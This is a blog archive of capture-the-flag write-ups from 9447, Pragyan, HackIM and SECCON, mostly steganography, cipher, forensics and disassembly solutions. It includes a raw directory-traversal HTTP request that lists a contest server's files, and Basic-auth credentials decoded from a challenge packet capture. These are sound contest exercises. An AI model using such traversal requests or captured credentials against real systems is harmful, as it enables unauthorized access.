Category Archives: Main
9447 CTF – 2015

Another great CTF again this year. 9447 ran smooth. I did not notice any challenge issues. Typical challenge categories web, misc, reverse, exploit, and stego.  All challenges were very good. Here is a short write up to the two challenges I was able to complete. I Look forward to next years CTF!

 
imaged (90pts) 1 day, 22 hours, 6 minutes, 9 seconds remaining Our spies found this image. They think something is hidden in it… what could it be?

Image is just a plain rectangle box PNG

imaged

Ran through the normal tools

pngcheck imaged.png
OK: imaged.png (2997×14595, 4-bit palette, non-interlaced, -0.2%).

ran through strings
strings imaged.png | more
IHDR
9447
0PLTE
H40t
0l(t
{Ste
IDATx

I see the 9447 start of what looks like a flag so open it up in a hex editor

hex

I see the 9447 but nothing after it looks like a flag. Looked up the PNG specs all the pieces seem to be there nothing extra/optional in the images. Then I just started looking at each chunk header just to validate
Again non of the optionals are there. But there is a number if IDAT entries. And just 8 bytes before the first one I see a {Ste
That looks a little like a flag. So I search for the next one
and its g0_r
then the next one edun
and so on and so on until I come up with the flag. SCORE!

flag is 9447{Steg0_redunDaNcy_CHeck}

———————————————————————–
YWS (130pts) 1 day, 23 hours, 15 minutes, 17 seconds remaining My friend wrote a cool web server. I’m sure he’s stored some great doxxxs on the website. Can you take a look and report back any interesting things you find?

The web page is at http://yws-fsiqc922.9447.plumbing

start BURP proxy
start clicking through BURP discovered link for flag URL

doing a
GET /.. HTTP/1.1
Host: yws-fsiqc922.9447.plumbing
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

response

HTTP/1.1 200 OK
Server: BWS 0.1
Content-Length: 336
Accept-Ranges: bytes
Connection: close

<html>
<head>
<title>Directory listing for /..</title>
</head>
<body>
<h2>Directory listing for /..</h2>
<hr>
<ul>
<li><a href=”/../9447{D1rect0ries_ARe_h4rd}”>9447{D1rect0ries_ARe_h4rd}</a>
<li><a href=”/../.”>.</a>
<li><a href=”/../..”>..</a>
<li><a href=”/../gws”>gws</a>
<li><a href=”/../files”>files</a>
</ul>
<hr>
</body>
</html>

funny going to /.. with a browser did not display the page. Just sent us back to the main page.

FLAG IS
9447{D1rect0ries_ARe_h4rd}

 

PragyanCTF

Another nice CTF. This one was pretty laid back went for over a weeks time.  Seemed to have a lot of Stego and crypto challenges pretty low on an type of reverse or forensics. Everything seems to have gone smoothly I didn’t notice any issues. Some members of OverflowSecurity were in and out of the challenges. Here are the write ups for the ones that I completed.

STEGO

Put on your reading glasses (10 pts)
run strings on file. flag is on the bottom

strings Proxy.jpg

M}EU]sF
1Z5;”A
kjiFF
16bbee7466db38dad50701223d57ace8

 

What you see is what you get. (50 pts)

run strings the bottom shows us the program used and key to extract

#strings stego_50.jpg
:W9K
QIK@
RP!h
usethisUT
steghide.sourceforge.net/download.phpPK
usethisUT
Delta_Force\m/

steghide –extract -sf stego_50.jpg
Enter passphrase:
wrote extracted data to “key_stego_1”.
root@kali:~/CTF/pragyan/stego/what-you-see-is-what-you-get# ls
key_stego_1 stegcrack.pl stego_50.jpg
root@kali:~/CTF/pragyan/stego/what-you-see-is-what-you-get# cat key_stego_1
Congrats! This was way too wasy 😛

This is the key:

PrAgyaNCTF_sTeg1_key

 

CRYPTO

One more headache (20 pts)

This is a PRGYAN event
text file called substitution given with the following text
dhkuagsn
assuming that PRGYAN is the key

used an online decoder
http://www.braingle.com/brainteasers/codes/keyword.php

entered key: prgyanpr cipher text: dhkuagsn

solution: ilovectf

 

FORENSICS
Access Code (30pts)
Find the access code

a PDF is shown

pdg-image

 

RIP JPEG from PDF ( can right click and save it)

this is the JPEG

out-000

Did a google image search via drag and drop image into search box and find the artist name is Sascha Herm

The PDF said KEYED painter so go to online keyword cipher decoder
http://www.braingle.com/brainteasers/codes/keyword.php

use KEY: saschahermsasch
with Cipher Text: heitsctrnpsmysk
and get the flag: deltactfpragyan

 

MISC
Totally abstruse (30 pts)

no point guessing

was given an image.

world

A goggle image  search on this images brought up the Piet programming language.
found an online interpreter at
http://www.bertnase.de/npiet/npiet-execute.php

execute the image/code

Hi,
Welcome to npiet online !

Info: upload status: Ok
Info: found picture width=115 height=115 and codel size=5
Uploaded picture (shown with a small border): world.png

Info: executing: npiet -e 1000000 world.png

Hello, world!

Flag: Hello, world!

 

HackIM 2015

Another good CTF. I found it very challenging.  Most of my team was not able to participate so we did not do well. I was only able to solve one problem myself but was on the right track it seems on several others. I’m sure if we had more team members participating we could have put our minds together and solved more.

 

Forensics 300

mount -o loop FOR-300 /media/image

ls -laf

There is a .sh on the root directory that created random directories and files.

 

total 84K
-rw-r–r– 1 root root 4.9K Dec 31 1969 02CdWGSxGPX.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 0GY1l
drwxr-xr-x 1 root root 0 Dec 31 1969 0h3a5
drwxr-xr-x 1 root root 0 Dec 31 1969 0l
drwxr-xr-x 1 root root 0 Dec 31 1969 0qsd
drwxr-xr-x 1 root root 0 Dec 31 1969 0wDq5
drwxr-xr-x 1 root root 0 Dec 31 1969 0Xs
drwxr-xr-x 1 root root 0 Dec 31 1969 1
drwxr-xr-x 1 root root 0 Dec 31 1969 2X
drwxr-xr-x 1 root root 0 Dec 31 1969 3
drwxr-xr-x 1 root root 0 Dec 31 1969 3J
drwxr-xr-x 1 root root 0 Dec 31 1969 44aAm
drwxr-xr-x 1 root root 0 Dec 31 1969 4A
drwxr-xr-x 1 root root 0 Dec 31 1969 4c
drwxr-xr-x 1 root root 0 Dec 31 1969 4CfVyuIW
drwxr-xr-x 1 root root 0 Dec 31 1969 4CQU
drwxr-xr-x 1 root root 208 Dec 31 1969 5Iuc
drwxr-xr-x 1 root root 260 Dec 31 1969 5U7WRf
-rw-r–r– 1 root root 19K Dec 31 1969 5ySfqnmFgFQd6il.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 6JR3
drwxr-xr-x 1 root root 124 Dec 31 1969 6wUaZE1vbsW
drwxr-xr-x 1 root root 0 Dec 31 1969 75c083YdQf
drwxr-xr-x 1 root root 0 Dec 31 1969 7H7geLlS5
drwxr-xr-x 1 root root 0 Dec 31 1969 8A2MFawD4
drwxr-xr-x 1 root root 0 Dec 31 1969 8DQFirm0D
drwxr-xr-x 1 root root 0 Dec 31 1969 8HhWfV9nK1
drwxr-xr-x 1 root root 0 Dec 31 1969 8nwg
drwxr-xr-x 1 root root 0 Dec 31 1969 8RxQG4bvd
drwxr-xr-x 1 root root 0 Dec 31 1969 95D
drwxr-xr-x 1 root root 2.3K Dec 31 1969 a
drwxr-xr-x 1 root root 0 Dec 31 1969 aCIzN8I5
drwxr-xr-x 1 root root 0 Dec 31 1969 acy
drwxr-xr-x 1 root root 0 Dec 31 1969 Ad1CAg
drwxr-xr-x 1 root root 0 Dec 31 1969 aE
drwxr-xr-x 1 root root 0 Dec 31 1969 b
drwxr-xr-x 1 root root 268 Dec 31 1969 b0dNwf3bNy
drwxr-xr-x 1 root root 0 Dec 31 1969 b66
-rw-r–r– 1 root root 11K Dec 31 1969 B6IdX6a.bin
drwxr-xr-x 1 root root 284 Dec 31 1969 BY
-rw-r–r– 1 root root 12K Dec 31 1969 BYqYsXqp.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 C
drwxr-xr-x 1 root root 0 Dec 31 1969 CEBIjqOoYttzQ
drwxr-xr-x 1 root root 0 Dec 31 1969 cOyWvykD1l1
drwxr-xr-x 1 root root 0 Dec 31 1969 cQLp9t6svJj
drwxr-xr-x 1 root root 0 Dec 31 1969 cTFarHjM
drwxr-xr-x 1 root root 0 Dec 31 1969 d2
drwxr-xr-x 1 root root 216 Dec 31 1969 dG7pHp24fl
drwxr-xr-x 1 root root 0 Dec 31 1969 DGcf
drwxr-xr-x 1 root root 0 Dec 31 1969 doKP
drwxr-xr-x 1 root root 144 Dec 31 1969 dontD0AnythingHERE
drwxr-xr-x 1 root root 0 Dec 31 1969 DS33Meg
drwxr-xr-x 1 root root 260 Dec 31 1969 duKt4ZJ
drwxr-xr-x 1 root root 0 Dec 31 1969 e
drwxr-xr-x 1 root root 0 Dec 31 1969 Ebnpv
drwxr-xr-x 1 root root 0 Dec 31 1969 F
drwxr-xr-x 1 root root 0 Dec 31 1969 FdnSdaQwA
drwxr-xr-x 1 root root 0 Dec 31 1969 FfrD0o
drwxr-xr-x 1 root root 0 Dec 31 1969 FinD
drwxr-xr-x 1 root root 0 Dec 31 1969 fm
drwxr-xr-x 1 root root 0 Dec 31 1969 g
drwxr-xr-x 1 root root 0 Dec 31 1969 gtj
drwxr-xr-x 1 root root 0 Dec 31 1969 h
drwxr-xr-x 1 root root 0 Dec 31 1969 H
drwxr-xr-x 1 root root 0 Dec 31 1969 H2Zj8FNbu
drwxr-xr-x 1 root root 0 Dec 31 1969 hdi7
drwxr-xr-x 1 root root 0 Dec 31 1969 hYuPvID
drwxr-xr-x 1 root root 0 Dec 31 1969 i
drwxr-xr-x 1 root root 132 Dec 31 1969 imgLDPt4BY
drwxr-xr-x 1 root root 0 Dec 31 1969 ix1EMRHRpIc2
drwxr-xr-x 1 root root 0 Dec 31 1969 j6uLMX
drwxr-xr-x 1 root root 0 Dec 31 1969 jE
drwxr-xr-x 1 root root 0 Dec 31 1969 jj
drwxr-xr-x 1 root root 0 Dec 31 1969 junk
drwxr-xr-x 1 root root 0 Dec 31 1969 JUr
drwxr-xr-x 1 root root 0 Dec 31 1969 K2QWa5
drwxr-xr-x 1 root root 116 Dec 31 1969 k6
drwxr-xr-x 1 root root 0 Dec 31 1969 k6B4zgvO9Ee
drwxr-xr-x 1 root root 0 Dec 31 1969 kNJSs
drwxr-xr-x 1 root root 0 Dec 31 1969 KS
drwxr-xr-x 1 root root 0 Dec 31 1969 KxEQM
drwxr-xr-x 1 root root 0 Dec 31 1969 LG6F
drwxr-xr-x 1 root root 0 Dec 31 1969 Lh
-rw-r–r– 1 root root 2.1K Dec 31 1969 LlC6Z0zrgy.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 LO0J8
drwx—— 1 root root 0 Dec 31 1969 lost+found
drwxr-xr-x 1 root root 0 Dec 31 1969 LvuGM
drwxr-xr-x 1 root root 0 Dec 31 1969 lWIRfzP
drwxr-xr-x 1 root root 0 Dec 31 1969 m
drwxr-xr-x 1 root root 0 Dec 31 1969 m9V0lIaElz
drwxr-xr-x 1 root root 0 Dec 31 1969 MiU
drwxr-xr-x 1 root root 0 Dec 31 1969 Mnuc
drwxr-xr-x 1 root root 0 Dec 31 1969 n
drwxr-xr-x 1 root root 208 Dec 31 1969 NgzQPW
drwxr-xr-x 1 root root 0 Dec 31 1969 Nv
drwxr-xr-x 1 root root 0 Dec 31 1969 o
drwxr-xr-x 1 root root 0 Dec 31 1969 O7avZhikgKgbF
drwxr-xr-x 1 root root 0 Dec 31 1969 o8
drwxr-xr-x 1 root root 0 Dec 31 1969 OOoOs
drwxr-xr-x 1 root root 148 Dec 31 1969 orcA
drwxr-xr-x 1 root root 0 Dec 31 1969 oSx2p
drwxr-xr-x 1 root root 0 Dec 31 1969 OT
drwxr-xr-x 1 root root 108 Dec 31 1969 poiuy7Xdb
drwxr-xr-x 1 root root 0 Dec 31 1969 px6u
drwxr-xr-x 1 root root 0 Dec 31 1969 Q
drwxr-xr-x 1 root root 224 Dec 31 1969 qkCN8
drwxr-xr-x 1 root root 0 Dec 31 1969 QmUY1d
drwxr-xr-x 1 root root 240 Dec 31 1969 QQY3sF63w
drwxr-xr-x 1 root root 0 Dec 31 1969 r
drwxr-xr-x 1 root root 0 Dec 31 1969 Raf3SYj
-rw-r–r– 1 root root 4.2K Dec 31 1969 ran2.sh
drwxr-xr-x 1 root root 256 Dec 31 1969 rhZE1LZ6g
drwxr-xr-x 1 root root 0 Dec 31 1969 Ruc9
drwxr-xr-x 1 root root 0 Dec 31 1969 RZTOGd
drwxr-xr-x 1 root root 0 Dec 31 1969 scripts
-rw-r–r– 1 root root 0 Dec 31 1969 sdb.cramfs
drwxr-xr-x 1 root root 0 Dec 31 1969 sn
drwxr-xr-x 1 root root 0 Dec 31 1969 SPaK8l2sYN
drwxr-xr-x 1 root root 0 Dec 31 1969 SrZznhSAj
drwxr-xr-x 1 root root 0 Dec 31 1969 t
drwxr-xr-x 1 root root 0 Dec 31 1969 T
-rw-r–r– 1 root root 2.2K Dec 31 1969 TFGVOSwYd.txt
drwxr-xr-x 1 root root 0 Dec 31 1969 TFhmGS
drwxr-xr-x 1 root root 0 Dec 31 1969 u
drwxr-xr-x 1 root root 0 Dec 31 1969 uHuZk04I
drwxr-xr-x 1 root root 0 Dec 31 1969 UivNZ
drwxr-xr-x 1 root root 0 Dec 31 1969 UpVRswF
drwxr-xr-x 1 root root 0 Dec 31 1969 URdRCrZo
drwxr-xr-x 1 root root 0 Dec 31 1969 v
-rw-r–r– 1 root root 9.0K Dec 31 1969 W0HTWw6oxK.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 weH
drwxr-xr-x 1 root root 0 Dec 31 1969 wOImbu
drwxr-xr-x 1 root root 0 Dec 31 1969 xawcc
drwxr-xr-x 1 root root 0 Dec 31 1969 Xde
-rw-r–r– 1 root root 6.0K Dec 31 1969 XM8cUidmtho.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 Xnd5
drwxr-xr-x 1 root root 0 Dec 31 1969 XZn
drwxr-xr-x 1 root root 0 Dec 31 1969 Y
drwxr-xr-x 1 root root 0 Dec 31 1969 YDTfukUo
drwxr-xr-x 1 root root 0 Dec 31 1969 YMrSfm
drwxr-xr-x 1 root root 0 Dec 31 1969 Ys
-rw-r–r– 1 root root 2.5K Dec 31 1969 zBY1I NZU1pc.txt

 

Tried several methods looked through files by date to see if one was modified more recent. looked by file size to see if one stood out as bigger. But in the end running file on every file made some of the files standout. After looking through 3 or 4 of those files the flag was found.

 

run file on all the files to see if anything stands out. See several txt and jpg files. Looking through found a jpg as the flag.

find . -name ‘*’ -exec file {} + | more

./poiuy7Xdb/7yknXuW/VXIXNxl/sZ5 lxAn3HBp: directory
./poiuy7Xdb/7yknXuW/VXIXNxl/sZ5 lxAn3HBp/05O1rxFMm.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/sZ5 lxAn3HBp/HjrRoQkK2v.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/sZ5 lxAn3HBp/chDQpCvsZmlD.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/sZ5 lxAn3HBp/gcTf6LR8ZR.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/siFH0M2Vgh: directory
./poiuy7Xdb/7yknXuW/VXIXNxl/siFH0M2Vgh/MVI4LugVpb7qg.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/siFH0M2Vgh/uPQpX9Kxm3QEr33zaH.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/wmDKAM 1: directory
./poiuy7Xdb/7yknXuW/VXIXNxl/wmDKAM 1/7PgIrSa.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/wmDKAM 1/GhIMarfKkrrB.JPG: data
./poiuy7Xdb/7yknXuW/VXIXNxl/wmDKAM 1/lkjhwerle.jpg: JPEG image data, JFIF standard 1.01
./poiuy7Xdb/7yknXuW/gDObUWcZZG: directory
./poiuy7Xdb/7yknXuW/gDObUWcZZG/2maON5: directory
./poiuy7Xdb/7yknXuW/gDObUWcZZG/2maON5/HuD6lKeYHl.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/2maON5/z9XJfuFfqIXSU.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/5ErUBUSL3uNc.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/WGmoUW6YJ6ne: directory
./poiuy7Xdb/7yknXuW/gDObUWcZZG/WGmoUW6YJ6ne/5zOfI0qlna9R.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/WGmoUW6YJ6ne/EfRU5k8r.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/WGmoUW6YJ6ne/ILK9wXbmeS9DKOL.JPG: data
./poiuy7Xdb/7yknXuW/gDObUWcZZG/WGmoUW6YJ6ne/gymTmPz.JPG: data

 

 

The file was ./poiuy7Xdb/7yknXuW/VXIXNxl/wmDKAM 1/lkjhwerle.jpg:                          JPEG image data, JFIF standard 1.01

flag{f0rens!cs!sC00l}

 

SECCON 2014

SECCON 2014 took place last weekend and again part of my CTF was able to participate. For this most part I felt this was a well run CTF. The biggest issue I noticed was with the web challenges.  There were issues with required DLL’s and the like that caused a lot of conversation in the IRC channel. I didnt work on any of those challenges so I cant speak to it first hand. But there was a nice mix of challenges even QR challenges.

 

Challenges :

Welcome to SECCON Start 100 / 100
Easy Cipher Crypto 100 / 100
Decrypt it (Easy) Crypto 0 / 200
Decrypt it (Hard) Crypto 0 / 300
Ms.Fortune? Misfortune. : 4096-bit RSA Crypto 0 / 400
Shuffle Binary 100 / 100
Reverse it Binary 0 / 100
Let’s disassemble Binary 0 / 200
Advanced RISC Machine Exploit 0 / 300
ROP: Impossible Exploit 0 / 500
Holy shellcode Exploit 0 / 400
Japanese super micro-controller Exploit 0 / 500
jspuzzle Web 0 / 100
REA-JUU WATCH Web 200 / 200
Bleeding “Heartbleed” Test Web Web 0 / 300
Binary Karuta Web 0 / 400
XSS Bonsai (aka. Hakoniwa XSS Reloaded) Web 0 / 500
QR (Easy) QR 0 / 200
SECCON Wars: The Flag Awakens QR 0 / 300
BBQR QR 0 / 400
Get the key.txt Forensics 100 / 100
Read it Forensics 0 / 300
UnknownFS Forensics 0 / 400
Confused analyte Forensics 0 / 500
Choose the number Programming 100 / 100
The Golden Gate Programming 0 / 400
Get the key Network 100 / 100
Get from curious “FTP” server Network 0 / 300
version2 Network 0 / 200

 

Here are the notes for some of the challenges I solved.

Get the key  – 100

found web http session in provided PCAP.  Basic authentication

GET /nw100/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ja-JP,en-US;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 133.242.224.21:6809
Authorization: Basic c2VjY29uMjAxNDpZb3VyQmF0dGxlRmllbGQ=
Connection: Keep-Alive
DNT: 1

HTTP/1.1 200 OK
Date: Sat, 29 Nov 2014 13:10:48 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 450
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 3.2 Final//EN”>
<html>
<head>
<title>Index of /nw100</title>
</head>
<body>
<h1>Index of /nw100</h1>
<table><tr><th><img src=”/icons/blank.gif” alt=”[ICO]”></th><th><a href=”?C=N;O=D”>Name</a></th><th><a href=”?C=M;O=A”>Last modified</a></th><th><a href=”?C=S;O=A”>Size</a></th><th><a href=”?C=D;O=A”>Description</a></th></tr><tr><th colspan=”5″><hr></th></tr>
<tr><td valign=”top”><img src=”/icons/back.gif” alt=”[DIR]”></td><td><a href=”/”>Parent Directory</a></td><td>&nbsp;</td><td align=”right”> – </td><td>&nbsp;</td></tr>
<tr><td valign=”top”><img src=”/icons/text.gif” alt=”[TXT]”></td><td><a href=”key.html”>key.html</a></td><td align=”right”>29-Nov-2014 22:04 </td><td align=”right”> 45 </td><td>&nbsp;</td></tr>
<tr><th colspan=”5″><hr></th></tr>
</table>
<address>Apache/2.2.22 (Debian) Server at 133.242.224.21 Port 6809</address>
</body></html>
take info and decrypt base64 key

seccon2014:YourBattleField
goto web site and enter login

http://133.242.224.21:6809/nw100/key.html

get flag

SECCON{Basic_NW_Challenge_Done!}

————————————————————————————————–

Shuffle – 100
Load into hopper look at main function convert each mov eax to characters

Dump of assembler code for function main:
0x0804852d <+0>: push ebp
0x0804852e <+1>: mov ebp,esp
0x08048530 <+3>: push esi
0x08048531 <+4>: push ebx
0x08048532 <+5>: and esp,0xfffffff0
0x08048535 <+8>: sub esp,0x50
0x08048538 <+11>: mov eax,DWORD PTR [ebp+0xc]
0x0804853b <+14>: mov DWORD PTR [esp+0xc],eax
0x0804853f <+18>: mov eax,gs:0x14
0x08048545 <+24>: mov DWORD PTR [esp+0x4c],eax
0x08048549 <+28>: xor eax,eax
0x0804854b <+30>: mov eax,0x53
0x08048550 <+35>: mov BYTE PTR [esp+0x24],al
0x08048554 <+39>: mov eax,0x45
0x08048559 <+44>: mov BYTE PTR [esp+0x25],al
0x0804855d <+48>: mov eax,0x43
0x08048562 <+53>: mov BYTE PTR [esp+0x26],al
0x08048566 <+57>: mov eax,0x43
0x0804856b <+62>: mov BYTE PTR [esp+0x27],al
0x0804856f <+66>: mov eax,0x4f
0x08048574 <+71>: mov BYTE PTR [esp+0x28],al
0x08048578 <+75>: mov eax,0x4e
0x0804857d <+80>: mov BYTE PTR [esp+0x29],al
0x08048581 <+84>: mov eax,0x7b
0x08048586 <+89>: mov BYTE PTR [esp+0x2a],al
0x0804858a <+93>: mov eax,0x57
0x0804858f <+98>: mov BYTE PTR [esp+0x2b],al
0x08048593 <+102>: mov eax,0x65
0x08048598 <+107>: mov BYTE PTR [esp+0x2c],al
0x0804859c <+111>: mov eax,0x6c
0x080485a1 <+116>: mov BYTE PTR [esp+0x2d],al
0x080485a5 <+120>: mov eax,0x63
0x080485aa <+125>: mov BYTE PTR [esp+0x2e],al
0x080485ae <+129>: mov eax,0x6f
0x080485b3 <+134>: mov BYTE PTR [esp+0x2f],al
0x080485b7 <+138>: mov eax,0x6d
0x080485bc <+143>: mov BYTE PTR [esp+0x30],al
0x080485c0 <+147>: mov eax,0x65
0x080485c5 <+152>: mov BYTE PTR [esp+0x31],al
0x080485c9 <+156>: mov eax,0x20
0x080485ce <+161>: mov BYTE PTR [esp+0x32],al
0x080485d2 <+165>: mov eax,0x74
0x080485d7 <+170>: mov BYTE PTR [esp+0x33],al
0x080485db <+174>: mov eax,0x6f
0x080485e0 <+179>: mov BYTE PTR [esp+0x34],al
0x080485e4 <+183>: mov eax,0x20
0x080485e9 <+188>: mov BYTE PTR [esp+0x35],al
0x080485ed <+192>: mov eax,0x74
0x080485f2 <+197>: mov BYTE PTR [esp+0x36],al
0x080485f6 <+201>: mov eax,0x68
0x080485fb <+206>: mov BYTE PTR [esp+0x37],al
0x080485ff <+210>: mov eax,0x65
0x08048604 <+215>: mov BYTE PTR [esp+0x38],al
0x08048608 <+219>: mov eax,0x20
0x0804860d <+224>: mov BYTE PTR [esp+0x39],al
0x08048611 <+228>: mov eax,0x53
0x08048616 <+233>: mov BYTE PTR [esp+0x3a],al
0x0804861a <+237>: mov eax,0x45
0x0804861f <+242>: mov BYTE PTR [esp+0x3b],al
0x08048623 <+246>: mov eax,0x43
0x08048628 <+251>: mov BYTE PTR [esp+0x3c],al
0x0804862c <+255>: mov eax,0x43
0x08048631 <+260>: mov BYTE PTR [esp+0x3d],al
0x08048635 <+264>: mov eax,0x4f
0x0804863a <+269>: mov BYTE PTR [esp+0x3e],al
0x0804863e <+273>: mov eax,0x4e
0x08048643 <+278>: mov BYTE PTR [esp+0x3f],al
0x08048647 <+282>: mov eax,0x20
0x0804864c <+287>: mov BYTE PTR [esp+0x40],al
0x08048650 <+291>: mov eax,0x32
0x08048655 <+296>: mov BYTE PTR [esp+0x41],al
0x08048659 <+300>: mov eax,0x30
0x0804865e <+305>: mov BYTE PTR [esp+0x42],al
0x08048662 <+309>: mov eax,0x31
0x08048667 <+314>: mov BYTE PTR [esp+0x43],al
0x0804866b <+318>: mov eax,0x34
0x08048670 <+323>: mov BYTE PTR [esp+0x44],al
0x08048674 <+327>: mov eax,0x20
0x08048679 <+332>: mov BYTE PTR [esp+0x45],al
0x0804867d <+336>: mov eax,0x43
0x08048682 <+341>: mov BYTE PTR [esp+0x46],al
0x08048686 <+345>: mov eax,0x54
0x0804868b <+350>: mov BYTE PTR [esp+0x47],al
0x0804868f <+354>: mov eax,0x46
0x08048694 <+359>: mov BYTE PTR [esp+0x48],al
0x08048698 <+363>: mov eax,0x21
0x0804869d <+368>: mov BYTE PTR [esp+0x49],al
0x080486a1 <+372>: mov eax,0x7d
0x080486a6 <+377>: mov BYTE PTR [esp+0x4a],al
0x080486aa <+381>: mov eax,0x0
0x080486af <+386>: mov BYTE PTR [esp+0x4b],al
0x080486b3 <+390>: mov DWORD PTR [esp],0x0
0x080486ba <+397>: call 0x80483b0 <time@plt>
0x080486bf <+402>: mov ebx,eax
0x080486c1 <+404>: call 0x80483d0 <getpid@plt>
0x080486c6 <+409>: add eax,ebx
0x080486c8 <+411>: mov DWORD PTR [esp],eax
0x080486cb <+414>: call 0x8048400 <srand@plt>
0x080486d0 <+419>: mov DWORD PTR [esp+0x14],0x0
0x080486d8 <+427>: jmp 0x8048769 <main+572>
0x080486dd <+432>: call 0x8048420 <rand@plt>
0x080486e2 <+437>: mov ecx,eax
0x080486e4 <+439>: mov edx,0xcccccccd
0x080486e9 <+444>: mov eax,ecx
0x080486eb <+446>: mul edx
0x080486ed <+448>: shr edx,0x5
0x080486f0 <+451>: mov eax,edx
0x080486f2 <+453>: shl eax,0x2
0x080486f5 <+456>: add eax,edx
0x080486f7 <+458>: shl eax,0x3
0x080486fa <+461>: sub ecx,eax
0x080486fc <+463>: mov edx,ecx
0x080486fe <+465>: mov DWORD PTR [esp+0x18],edx
0x08048702 <+469>: call 0x8048420 <rand@plt>
0x08048707 <+474>: mov ecx,eax
0x08048709 <+476>: mov edx,0xcccccccd
0x0804870e <+481>: mov eax,ecx
0x08048710 <+483>: mul edx
0x08048712 <+485>: shr edx,0x5
0x08048715 <+488>: mov eax,edx
0x08048717 <+490>: shl eax,0x2
0x0804871a <+493>: add eax,edx
0x0804871c <+495>: shl eax,0x3
0x0804871f <+498>: sub ecx,eax
0x08048721 <+500>: mov edx,ecx
0x08048723 <+502>: mov DWORD PTR [esp+0x1c],edx
0x08048727 <+506>: lea edx,[esp+0x24]
0x0804872b <+510>: mov eax,DWORD PTR [esp+0x18]
0x0804872f <+514>: add eax,edx
0x08048731 <+516>: movzx eax,BYTE PTR [eax]
0x08048734 <+519>: movsx eax,al
0x08048737 <+522>: mov DWORD PTR [esp+0x20],eax
0x0804873b <+526>: lea edx,[esp+0x24]
0x0804873f <+530>: mov eax,DWORD PTR [esp+0x1c]
0x08048743 <+534>: add eax,edx
0x08048745 <+536>: movzx eax,BYTE PTR [eax]
0x08048748 <+539>: lea ecx,[esp+0x24]
0x0804874c <+543>: mov edx,DWORD PTR [esp+0x18]
0x08048750 <+547>: add edx,ecx
0x08048752 <+549>: mov BYTE PTR [edx],al
0x08048754 <+551>: mov eax,DWORD PTR [esp+0x20]
0x08048758 <+555>: lea ecx,[esp+0x24]
0x0804875c <+559>: mov edx,DWORD PTR [esp+0x1c]
0x08048760 <+563>: add edx,ecx
0x08048762 <+565>: mov BYTE PTR [edx],al
0x08048764 <+567>: add DWORD PTR [esp+0x14],0x1
0x08048769 <+572>: cmp DWORD PTR [esp+0x14],0x63
0x0804876e <+577>: jle 0x80486dd <main+432>
0x08048774 <+583>: lea eax,[esp+0x24]
0x08048778 <+587>: mov DWORD PTR [esp],eax
0x0804877b <+590>: call 0x80483e0 <puts@plt>
0x08048780 <+595>: mov eax,0x0
0x08048785 <+600>: mov esi,DWORD PTR [esp+0x4c]
0x08048789 <+604>: xor esi,DWORD PTR gs:0x14
0x08048790 <+611>: je 0x8048797 <main+618>
0x08048792 <+613>: call 0x80483c0 <__stack_chk_fail@plt>
0x08048797 <+618>: lea esp,[ebp-0x8]
0x0804879a <+621>: pop ebx
0x0804879b <+622>: pop esi
0x0804879c <+623>: pop ebp
0x0804879d <+624>: ret

flag is SECCON{Welcome to the SECCON 2014 CTF!}

 

——————————————————–

Easy Cipher – 100

Pulled out the extended ASCII chart to decrypt. This was a mix of dec hex and oct.

87 101 108 1100011 0157 6d 0145 040 116 0157 100000 0164 104 1100101 32 0123 69 67 0103 1001111
w   e   l    c     o    m   e        t   o            t   h     e        S    E  C   C    O
1001110 040 062 060 49 064 100000 0157 110 6c 0151 1101110 101 040 0103 1010100 70 101110 0124
N          2   0   1  4           o   n   l   i     e
1101000 101 100000 1010011 1000101 67 0103 4f 4e 100000 105 1110011 040 116 1101000 0145 040 1100010 0151 103 103 0145 1110011 0164 100000 1101000 0141 99 6b 1100101 0162 32 0143 111 1101110 1110100 101 0163 0164 040 0151 0156 040 74 0141 1110000 1100001 0156 056 4f 0157 0160 115 44 040 0171 1101111 117 100000 1110111 0141 0156 1110100 32 0164 6f 32 6b 1101110 1101111 1110111 100000 0164 1101000 0145 040 0146 6c 97 1100111 2c 100000 0144 111 110 100111 116 100000 1111001 6f 117 63 0110 1100101 0162 0145 100000 1111001 111 117 100000 97 114 0145 46 1010011 0105 0103 67 79 1001110 123 87 110011 110001 67 110000 1001101 32 55 060 100000 110111 0110 110011 32 53 51 0103
N     {   W   3      1     C   0       M        7  0            7    H       3      5  3  C
0103 060 0116 040 5a 0117 73 0101 7d 1001000 0141 1110110 1100101 100000 102 0165 0156 33
C   0    N       Z   O   I   A   }

 

SECCON{W31C0M 70 7H3 53CC0N ZOIA}

 

—————————–
find the key.txt  – 100

# mount -o loop forensic100 /media/test/
# ls /media/test/
1 109 119 129 139 149 159 169 179 189 199 208 218 228 238 28 38 48 58 68 78 88 98
10 11 12 13 14 15 16 17 18 19 2 209 219 229 239 29 39 49 59 69 79 89 99
100 110 120 130 140 150 160 170 180 190 20 21 22 23 24 3 4 5 6 7 8 9 lost+found
